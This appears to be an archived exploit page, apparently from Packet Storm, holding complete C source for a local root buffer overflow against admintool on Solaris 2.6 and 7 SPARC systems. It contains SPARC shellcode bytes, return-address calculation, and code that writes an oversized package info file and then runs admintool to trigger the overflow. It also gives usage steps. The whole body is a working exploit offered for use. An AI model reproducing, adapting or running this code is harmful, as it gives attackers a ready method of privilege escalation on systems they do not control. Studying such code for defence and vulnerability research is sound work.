Admintool local root exploit for Solaris2.6/7 Sparc machines.
b69c9cefb259fec08d07e73ec2112aafb9dd38c3c3df8295a4ee405733e2666d/*=============================================================================
admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY=yourdisplay:0.0
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#include <sys/utsname.h>
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i,vofs=0;
struct utsname name;
main()
{
uname(&name);
if (strcmp(name.release,"5.7")==0) vofs=-904;
system(PKGDIR);
putenv("LANG=");
if ((fp=fopen(PKGMAP,"wb"))==NULL){
printf("Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);
if ((fp=fopen(PKGINFO,"wb"))==NULL){
printf("Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"PKG=");
ret_adr=get_sp()-OFFSET+vofs;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;
printf("Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"VERSION=1.00\n");
fprintf(fp,"ARCH=sparc\n");
fprintf(fp,"CLASSES=none\n");
fprintf(fp,"CATEGORY=application\n");
fprintf(fp,"PSTAMP=990721\n");
fprintf(fp,"BASEDIR=/\n");
fclose(fp);
system("admintool");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed